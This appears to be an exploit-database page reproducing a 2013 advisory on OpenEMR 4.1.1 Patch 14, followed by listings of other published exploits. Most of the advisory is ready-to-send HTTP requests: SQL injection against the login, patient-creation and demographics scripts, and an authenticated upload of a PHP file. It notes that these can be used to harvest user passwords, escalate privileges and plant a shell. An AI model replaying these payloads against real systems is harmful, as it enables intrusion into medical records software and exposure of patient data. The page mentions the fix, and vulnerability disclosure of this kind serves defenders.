Menu

Search for hundreds of thousands of exploits

"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities"

Author

Exploit author

xistence

Platform

Exploit platform

php

Release date

Exploit published date

2013-09-17

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
###################################################################################################################################
# Exploit Title: OpenEMR 4.1.1 Patch 14 Multiple Vulnerabilities
# Date: Sep 17 2013
# Exploit Author: xistence < xistence[at]0x90[.]nl >
# Vendor Homepage: www.open-emr.org
# Tested on: CentOS 5.9 32-bit
# Affected Version :  4.1.1 Patch 14 and lower
# Fix: Upgrade to OpenEMR 4.1.2
#
# Software details:
#
# OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run on
# Windows, Linux, Mac OS X, and many other platforms. OpenEMR is ONC Complete Ambulatory EHR certified and is one of
# the most popular open source electronic medical records in use today. OpenEMR is supported by a strong community of
# volunteers #and professionals all with the common goal of making OpenEMR a superior alternative to its proprietary counterparts.
# The OpenEMR community is dedicated to guarding OpenEMR's status as a free, open source software solution for # medicalpractices
# and is dedicated to maintaining a spirit of openness, kindness and cooperation.
#
###################################################################################################################################


[ SQL Injection ]

[0x01] - The "authProvider" parameter in the "interface/main/main_screen.php" POST script is vulnerable to SQL Injection. A valid "authPass" password is needed before injection is possible (hash below is the default password "pass")

POST /openemr/interface/main/main_screen.php?auth=login&site=default HTTP/1.1
Host: <IP>
Referer: http://<IP>/openemr/interface/login/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135

authProvider=Default'[SQLi]&authUser=admin&clearPass=&languageChoice=1&authPass=9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684&authNewPass=

The POST request below could be used to retrieve passwords from other users and gain higher privileges (and after that upload a shell)


[0x02] - The "form_pubid" parameter in the "interface/new/new_comprehensive_save.php" script is vulnerable to SQL Injection.

POST /openemr/interface/new/new_comprehensive_save.php HTTP/1.1
Host: <IP>
Referer: http://<IP>/openemr/interface/new/new.php
Cookie: OpenEMR=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 286

form_cb_1=1&form_title=Mr.&form_fname=pwned&form_mname=&form_lname=pwned&form_pubpid=[SQLi]&form_DOB=2013-07-15&form_sex=Female&form_ss=&form_drivers_license=&form_status=&form_genericname1=&form_genericval1=&form_genericname2=&form_genericval2=&form_cb_2=1&form_street=&form_city=&form_stat


[0x03] - The "set_pid" parameter in the "interface/patient_file/summary/demographics.php" script is vulnerable to SQL Injection.
http://<IP>/openemr/interface/patient_file/summary/demographics.php?set_pid=-1[SQLi]


[ Arbitrary file upload ]

[0x01] - It's possible to upload any file after being authenticated.

POST /openemr/interface/super/manage_site_files.php HTTP/1.1
Host: <IP>
Referer: http://<IP>/openemr/interface/super/manage_site_files.php
Cookie: OpenEMR=blahblahblah
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------6745387234061449481375110870
Content-Length: 355

-----------------------------6745387234061449481375110870
Content-Disposition: form-data; name="form_image"; filename="pwned.php"
Content-Type: text/php

<?php phpinfo(); ?>
-----------------------------6745387234061449481375110870
Content-Disposition: form-data; name="bn_save"

Save
-----------------------------6745387234061449481375110870--
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2015-10-05 "ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal" webapps jsp xistence
2015-09-14 "ManageEngine OpManager 11.5 - Multiple Vulnerabilities" webapps multiple xistence
2015-09-14 "ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution" webapps multiple xistence
2014-03-19 "Quantum vmPRO 3.1.2 - Local Privilege Escalation" local hardware xistence
2014-03-19 "Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities" webapps hardware xistence
2014-03-19 "Quantum DXi V1000 2.2.1 - Static SSH Key" remote unix xistence
2014-03-19 "Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key" remote unix xistence
2014-02-05 "Pandora Fms 5.0RC1 - Remote Command Injection" webapps php xistence
2014-01-29 "ManageEngine Support Center Plus 7916 - Directory Traversal" webapps php xistence
2014-01-29 "A10 Networks Loadbalancer - Directory Traversal" webapps hardware xistence
2013-10-04 "Aanval 7.1 build 70151 - Multiple Vulnerabilities" webapps php xistence
2013-09-20 "OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)" remote php xistence
2013-09-20 "Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)" remote php xistence
2013-09-17 "Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities" webapps php xistence
2013-09-17 "OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities" webapps php xistence
2013-09-03 "TP-Link TD-W8951ND - Multiple Vulnerabilities" webapps hardware xistence
2013-07-25 "Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities" webapps php xistence
2013-06-26 "Motion - Multiple Vulnerabilities" remote multiple xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)" dos linux xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution" webapps php xistence
2012-12-29 "Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution" remote hardware xistence
2012-12-21 "YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities" webapps hardware xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)" remote windows xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal" webapps multiple xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection" remote multiple xistence
2012-10-17 "ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities" webapps jsp xistence
2012-04-15 "ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities" webapps multiple xistence
2011-06-23 "ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal" webapps jsp xistence 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected